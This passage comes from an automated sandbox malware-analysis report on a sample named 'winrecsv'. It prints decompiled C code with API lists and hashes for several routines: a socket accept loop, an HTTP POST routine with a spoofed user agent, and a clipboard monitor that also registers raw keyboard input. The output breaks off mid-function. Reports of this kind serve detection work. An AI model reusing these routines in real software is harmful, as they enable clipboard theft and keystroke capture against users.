                                                                                  • Instruction Fuzzy Hash: CF91C7B1D41318ABEB20DB50DC45FEA7775BB88705F0484F9F609A61C1DAB89AC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 364 40e7a0-40e7c7 GetTickCount WaitForSingleObject 365 40e949-40e94f 364->365 366 40e7cd-40e7e4 WSAWaitForMultipleEvents 364->366 367 40e870-40e883 GetTickCount 366->367 368 40e7ea-40e801 WSAEnumNetworkEvents 366->368 369 40e8c3-40e8cc GetTickCount 367->369 370 40e885-40e894 EnterCriticalSection 367->370 368->367 371 40e803-40e808 368->371 372 40e935-40e943 WaitForSingleObject 369->372 373 40e8ce-40e8dd EnterCriticalSection 369->373 374 40e896-40e89d 370->374 375 40e8ba-40e8c1 LeaveCriticalSection 370->375 371->367 376 40e80a-40e810 371->376 372->365 372->366 377 40e921-40e931 LeaveCriticalSection GetTickCount 373->377 378 40e8df-40e8f7 InterlockedExchangeAdd call 40c210 373->378 379 40e8b5 call 40e6a0 374->379 380 40e89f-40e8a7 374->380 375->372 376->367 381 40e812-40e831 accept 376->381 377->372 389 40e917-40e91f 378->389 390 40e8f9-40e902 378->390 379->375 380->374 384 40e8a9-40e8b0 LeaveCriticalSection 380->384 381->367 382 40e833-40e842 call 40e330 381->382 382->367 391 40e844-40e85f call 40e5c0 382->391 384->372 389->377 389->378 390->389 392 40e904-40e90d call 409940 390->392 391->367 397 40e861-40e867 391->397 392->389 397->367 398 40e869-40e86b call 40eb70 397->398 398->367
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040E7A0(intOrPtr* _a4) {
                                                                                  				intOrPtr _v64;
                                                                                  				char _v68;
                                                                                  				long _v72;
                                                                                  				signed char _v80;
                                                                                  				long _v92;
                                                                                  				char _v96;
                                                                                  				char _v100;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				long _t31;
                                                                                  				long _t33;
                                                                                  				long _t34;
                                                                                  				long _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t56;
                                                                                  				intOrPtr _t70;
                                                                                  				intOrPtr* _t73;
                                                                                  				long _t74;
                                                                                  				intOrPtr _t75;
                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                  				intOrPtr* _t77;
                                                                                  				void* _t78;
                                                                                  				signed int _t79;
                                                                                  				void* _t81;
                                                                                  
                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                  				_t31 = GetTickCount();
                                                                                  				_t56 = _a4;
                                                                                  				_v72 = _t31;
                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				if(_t33 == 0) {
                                                                                  					L25:
                                                                                  					return _t33;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					_t73 = _t56 + 0x18;
                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                  					if(_t33 != 0x102) {
                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                  							_v100 = 0x10;
                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                  							if(_t49 != 0xffffffff) {
                                                                                  								_t77 = E0040E330(_t56, _t49);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								if(_t77 != 0) {
                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                  									E0040E5C0(0, _t77, _t56, _t15);
                                                                                  									_t81 = _t81 + 8;
                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                  										E0040EB70(_t77);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t34 = GetTickCount();
                                                                                  					_t74 = _v92;
                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                  							goto L24;
                                                                                  						}
                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  						if(_t75 == 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                  							_v92 = GetTickCount();
                                                                                  							goto L24;
                                                                                  						} else {
                                                                                  							goto L19;
                                                                                  						}
                                                                                  						do {
                                                                                  							L19:
                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                  							if(E0040C210() - _t42 >= 0x1e) {
                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                  									E00409940(_t45);
                                                                                  									_t81 = _t81 + 4;
                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                  								}
                                                                                  							}
                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                  						} while (_t75 != 0);
                                                                                  						goto L23;
                                                                                  					}
                                                                                  					_t76 = _t56 + 0x20;
                                                                                  					EnterCriticalSection(_t76);
                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  					if(_t70 == 0) {
                                                                                  						L16:
                                                                                  						LeaveCriticalSection(_t76);
                                                                                  						goto L24;
                                                                                  					}
                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                  						if(_t70 != 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							LeaveCriticalSection(_t76);
                                                                                  							goto L24;
                                                                                  						}
                                                                                  					}
                                                                                  					E0040E6A0(_t56, _t70, _t78);
                                                                                  					goto L16;
                                                                                  					L24:
                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				} while (_t33 != 0);
                                                                                  				goto L25;
                                                                                  			}




























                                                                                  0x0040e7a6
                                                                                  0x0040e7ac
                                                                                  0x0040e7b2
                                                                                  0x0040e7b5
                                                                                  0x0040e7bf
                                                                                  0x0040e7c7
                                                                                  0x0040e949
                                                                                  0x0040e94f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e7cd
                                                                                  0x0040e7cd
                                                                                  0x0040e7d3
                                                                                  0x0040e7d9
                                                                                  0x0040e7e4
                                                                                  0x0040e7f6
                                                                                  0x0040e801
                                                                                  0x0040e812
                                                                                  0x0040e820
                                                                                  0x0040e828
                                                                                  0x0040e831
                                                                                  0x0040e83b
                                                                                  0x0040e83d
                                                                                  0x0040e842
                                                                                  0x0040e844
                                                                                  0x0040e850
                                                                                  0x0040e855
                                                                                  0x0040e85f
                                                                                  0x0040e86b
                                                                                  0x0040e86b
                                                                                  0x0040e85f
                                                                                  0x0040e842
                                                                                  0x0040e831
                                                                                  0x0040e801
                                                                                  0x0040e876
                                                                                  0x0040e878
                                                                                  0x0040e883
                                                                                  0x0040e8cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e8d2
                                                                                  0x0040e8d8
                                                                                  0x0040e8dd
                                                                                  0x0040e921
                                                                                  0x0040e925
                                                                                  0x0040e931
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e8df
                                                                                  0x0040e8df
                                                                                  0x0040e8e5
                                                                                  0x0040e8f7
                                                                                  0x0040e8f9
                                                                                  0x0040e902
                                                                                  0x0040e905
                                                                                  0x0040e90a
                                                                                  0x0040e90d
                                                                                  0x0040e90d
                                                                                  0x0040e902
                                                                                  0x0040e917
                                                                                  0x0040e91d
                                                                                  0x00000000
                                                                                  0x0040e8df
                                                                                  0x0040e885
                                                                                  0x0040e889
                                                                                  0x0040e88f
                                                                                  0x0040e894
                                                                                  0x0040e8ba
                                                                                  0x0040e8bb
                                                                                  0x00000000
                                                                                  0x0040e8bb
                                                                                  0x0040e896
                                                                                  0x0040e89f
                                                                                  0x0040e8a7
                                                                                  0x00000000
                                                                                  0x0040e8a9
                                                                                  0x0040e8aa
                                                                                  0x00000000
                                                                                  0x0040e8aa
                                                                                  0x0040e8a7
                                                                                  0x0040e8b5
                                                                                  0x00000000
                                                                                  0x0040e935
                                                                                  0x0040e93b
                                                                                  0x0040e941
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040E7AC
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E7BF
                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E7D9
                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E7F6
                                                                                  • accept.WS2_32(?,?,?), ref: 0040E828
                                                                                  • GetTickCount.KERNEL32 ref: 0040E876
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E889
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8AA
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8BB
                                                                                  • GetTickCount.KERNEL32 ref: 0040E8C3
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E8D2
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E8E5
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E925
                                                                                  • GetTickCount.KERNEL32 ref: 0040E92B
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E93B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 3345448188-3762367603
                                                                                  • Opcode ID: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction ID: a4307afca7aad85b9c9d9f5dd23984def65cc417f4fb2f5aaa278dd0cd3fd46e
                                                                                  • Opcode Fuzzy Hash: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction Fuzzy Hash: AE4117725002009BCB10AF36DC88B9B77A4AB44720F048E39F899A72D1D778EC95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040D110(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				char* _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char _v852;
                                                                                  				long _v856;
                                                                                  				void _v1884;
                                                                                  				long _v1888;
                                                                                  				void* _t102;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t103 = _t102 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                  							_t29 =  &_v852; // 0x410928
                                                                                  							if(HttpSendRequestA(_v848,  *_t29, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                  								_v856 = 0;
                                                                                  								while(1 != 0) {
                                                                                  									_t98 = _v848;
                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                  										_v776 = E00408EA0(_v776, _t98, _v776, _v856 + _v1888);
                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                  										_t103 = _t103 + 0x14;
                                                                                  										_v856 = _v856 + _v1888;
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *_a16 = _v856;
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}






















                                                                                  0x0040d119
                                                                                  0x0040d123
                                                                                  0x0040d138
                                                                                  0x0040d13d
                                                                                  0x0040d140
                                                                                  0x0040d150
                                                                                  0x0040d156
                                                                                  0x0040d166
                                                                                  0x0040d16c
                                                                                  0x0040d188
                                                                                  0x0040d1a1
                                                                                  0x0040d1ae
                                                                                  0x0040d1da
                                                                                  0x0040d1e7
                                                                                  0x0040d210
                                                                                  0x0040d21d
                                                                                  0x0040d235
                                                                                  0x0040d23b
                                                                                  0x0040d251
                                                                                  0x0040d267
                                                                                  0x0040d26d
                                                                                  0x0040d277
                                                                                  0x0040d297
                                                                                  0x0040d2a6
                                                                                  0x0040d2cf
                                                                                  0x0040d2f0
                                                                                  0x0040d2f5
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d304
                                                                                  0x00000000
                                                                                  0x0040d2a6
                                                                                  0x0040d318
                                                                                  0x0040d318
                                                                                  0x0040d321
                                                                                  0x0040d321
                                                                                  0x0040d32e
                                                                                  0x0040d32e
                                                                                  0x0040d33b
                                                                                  0x0040d33b
                                                                                  0x0040d34a

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D138
                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040D188
                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040D19B
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D1D4
                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D20A
                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040D235
                                                                                  • HttpSendRequestA.WININET(00000000,(A,000000FF,00009E34), ref: 0040D25F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040D29E
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040D2F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D321
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D32E
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                  • String ID: (A$<$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                  • API String ID: 2761394606-712686588
                                                                                  • Opcode ID: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction ID: 9d1df4d468acb1d33fa47fc6a9b1e55a6919e6c831fa6972c8ee7f2cc9406756
                                                                                  • Opcode Fuzzy Hash: f4458c3659dfce4ad640defbef471a0297bca3ecd7cfe5da72ad61fa52f308f1
                                                                                  • Instruction Fuzzy Hash: 43511CB59012289BDB26CF94DC54BE973BDAB48705F1081E9B50DA6280D7B8AFC4CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 429 403db0-403dd2 GetWindowLongW 430 403dd4-403ddb 429->430 431 403df6-403dfd 429->431 432 403de1-403de5 430->432 433 403e67-403e78 IsClipboardFormatAvailable 430->433 434 403e26-403e2c 431->434 435 403dff 431->435 438 403e04-403e21 SetClipboardViewer SetWindowLongW 432->438 439 403de7-403deb 432->439 436 403e83-403e8d IsClipboardFormatAvailable 433->436 437 403e7a-403e81 433->437 441 403e46-403e4a 434->441 442 403e2e-403e44 SetWindowLongW 434->442 440 403fe4-403ffd DefWindowProcA 435->440 444 403e98-403ea2 IsClipboardFormatAvailable 436->444 445 403e8f-403e96 436->445 443 403eab-403eaf 437->443 438->440 446 403df1 439->446 447 403f9d-403fde RegisterRawInputDevices ChangeClipboardChain 439->447 448 403e62 441->448 449 403e4c-403e5c SendMessageA 441->449 442->448 451 403eb5-403ebf OpenClipboard 443->451 452 403f7f-403f83 443->452 444->443 450 403ea4 444->450 445->443 446->440 447->440 448->440 449->448 450->443 451->452 455 403ec5-403ed6 GetClipboardData 451->455 453 403f85-403f95 SendMessageA 452->453 454 403f9b 452->454 453->454 454->440 456 403ed8 455->456 457 403edd-403eee GlobalLock 455->457 456->440 458 403ef0 457->458 459 403ef5-403f06 457->459 458->440 460 403f08-403f0c 459->460 461 403f29-403f3c call 40b570 459->461 463 403f3e-403f4e call 403ce0 460->463 464 403f0e-403f12 460->464 469 403f51-403f65 GlobalUnlock CloseClipboard 461->469 463->469 465 403f14 464->465 466 403f16-403f27 call 403bd0 464->466 465->469 466->469 469->452 473 403f67-403f7c call 403480 call 408fb0 469->473 473->452
                                                                                  C-Code - Quality: 94%
                                                                                  			E00403DB0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				int _v12;
                                                                                  				struct HWND__* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				short _v26;
                                                                                  				short _v30;
                                                                                  				int _v32;
                                                                                  				short _v34;
                                                                                  				char _v36;
                                                                                  				int _v40;
                                                                                  				int _v44;
                                                                                  				struct HWND__* _t90;
                                                                                  				struct HWND__* _t97;
                                                                                  				struct HWND__* _t98;
                                                                                  				void* _t129;
                                                                                  
                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                  				_v40 = _a8;
                                                                                  				if(_v40 > 0x308) {
                                                                                  					if(_v40 == 0x30d) {
                                                                                  						if(_a12 != _v8) {
                                                                                  							if(_v8 != 0) {
                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v8 = _a16;
                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  						}
                                                                                  						goto L38;
                                                                                  					} else {
                                                                                  						L38:
                                                                                  						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                  					}
                                                                                  				}
                                                                                  				if(_v40 == 0x308) {
                                                                                  					_v12 = 0;
                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                  								_v12 = 7;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v12 = 1;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v12 = 0xd;
                                                                                  					}
                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                  						L34:
                                                                                  						if(_v8 != 0) {
                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                  						if(_v24 != 0) {
                                                                                  							_v20 = GlobalLock(_v24);
                                                                                  							if(_v20 != 0) {
                                                                                  								_v16 = 0;
                                                                                  								_v44 = _v12;
                                                                                  								if(_v44 == 1) {
                                                                                  									_t90 = E0040B570(_v20, 0, 0);
                                                                                  									_t129 = _t129 + 0xc;
                                                                                  									_v16 = _t90;
                                                                                  								} else {
                                                                                  									if(_v44 == 7) {
                                                                                  										_t97 = E00403CE0(_v20, 0, 0);
                                                                                  										_t129 = _t129 + 0xc;
                                                                                  										_v16 = _t97;
                                                                                  									} else {
                                                                                  										if(_v44 == 0xd) {
                                                                                  											_t98 = E00403BD0(_v20, _v20, 0);
                                                                                  											_t129 = _t129 + 8;
                                                                                  											_v16 = _t98;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								GlobalUnlock(_v24);
                                                                                  								CloseClipboard();
                                                                                  								if(_v16 != 0) {
                                                                                  									E00403480(_v16);
                                                                                  									E00408FB0(_v16);
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L38;
                                                                                  				}
                                                                                  				if(_v40 == 1) {
                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  				} else {
                                                                                  					if(_v40 == 2) {
                                                                                  						_v36 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v36 = 1;
                                                                                  						_v34 = 6;
                                                                                  						_v32 = 1;
                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                  					}
                                                                                  				}
                                                                                  				goto L38;
                                                                                  			}



















                                                                                  0x00403dc2
                                                                                  0x00403dc8
                                                                                  0x00403dd2
                                                                                  0x00403dfd
                                                                                  0x00403e2c
                                                                                  0x00403e4a
                                                                                  0x00403e5c
                                                                                  0x00403e5c
                                                                                  0x00403e2e
                                                                                  0x00403e31
                                                                                  0x00403e3e
                                                                                  0x00403e3e
                                                                                  0x00000000
                                                                                  0x00403dff
                                                                                  0x00403fe4
                                                                                  0x00403ffd
                                                                                  0x00403ffd
                                                                                  0x00403dfd
                                                                                  0x00403ddb
                                                                                  0x00403e67
                                                                                  0x00403e78
                                                                                  0x00403e8d
                                                                                  0x00403ea2
                                                                                  0x00403ea4
                                                                                  0x00403ea4
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403eaf
                                                                                  0x00403f7f
                                                                                  0x00403f83
                                                                                  0x00403f95
                                                                                  0x00403f95
                                                                                  0x00403ec5
                                                                                  0x00403ecf
                                                                                  0x00403ed6
                                                                                  0x00403ee7
                                                                                  0x00403eee
                                                                                  0x00403ef5
                                                                                  0x00403eff
                                                                                  0x00403f06
                                                                                  0x00403f31
                                                                                  0x00403f36
                                                                                  0x00403f39
                                                                                  0x00403f08
                                                                                  0x00403f0c
                                                                                  0x00403f46
                                                                                  0x00403f4b
                                                                                  0x00403f4e
                                                                                  0x00403f0e
                                                                                  0x00403f12
                                                                                  0x00403f1c
                                                                                  0x00403f21
                                                                                  0x00403f24
                                                                                  0x00403f24
                                                                                  0x00403f12
                                                                                  0x00403f0c
                                                                                  0x00403f55
                                                                                  0x00403f5b
                                                                                  0x00403f65
                                                                                  0x00403f6b
                                                                                  0x00403f77
                                                                                  0x00403f7c
                                                                                  0x00000000
                                                                                  0x00403f65
                                                                                  0x00000000
                                                                                  0x00403ef0
                                                                                  0x00403ed8
                                                                                  0x00000000
                                                                                  0x00403eaf
                                                                                  0x00403de5
                                                                                  0x00403e0e
                                                                                  0x00403e1b
                                                                                  0x00403de7
                                                                                  0x00403deb
                                                                                  0x00403f9f
                                                                                  0x00403fa5
                                                                                  0x00403fa8
                                                                                  0x00403fab
                                                                                  0x00403fb4
                                                                                  0x00403fbd
                                                                                  0x00403fc1
                                                                                  0x00403fd0
                                                                                  0x00403fde
                                                                                  0x00403fde
                                                                                  0x00403deb
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DBC
                                                                                  • SetClipboardViewer.USER32(?), ref: 00403E08
                                                                                  • SetWindowLongW.USER32 ref: 00403E1B
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403E70
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403EB7
                                                                                  • GetClipboardData.USER32 ref: 00403EC9
                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00403FD0
                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 00403FDE
                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00403FF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                  • String ID:
                                                                                  • API String ID: 3549449529-0
                                                                                  • Opcode ID: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction ID: 0016380ad0389118889d1cf690c65c1d7a98e8f3a274b3db5f7ad41e70fd50c0
                                                                                  • Opcode Fuzzy Hash: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction Fuzzy Hash: B3713D75D00209EFDB14DFA4D848BEEBBB8BF48306F14852AF505B6290D7799B40CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040E480(intOrPtr* __edi) {
                                                                                  				void* __esi;
                                                                                  				void* _t25;
                                                                                  				long _t40;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr* _t55;
                                                                                  				void* _t56;
                                                                                  				LONG* _t62;
                                                                                  
                                                                                  				_t53 = __edi;
                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                  					return _t25;
                                                                                  				} else {
                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                  					EnterCriticalSection(_t1);
                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                  					if(_t55 == 0) {
                                                                                  						L11:
                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                  						LeaveCriticalSection(_t13);
                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                  						_t56 = 0;
                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                  							L14:
                                                                                  							E0040C040( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                  							E0040C180( *((intOrPtr*)(_t53 + 0xc)));
                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                  							E00409940( *((intOrPtr*)(_t53 + 0x14)));
                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                  							DeleteCriticalSection(_t24);
                                                                                  							return E00408FB0(_t53);
                                                                                  						}
                                                                                  						do {
                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                  						goto L14;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					do {
                                                                                  						L3:
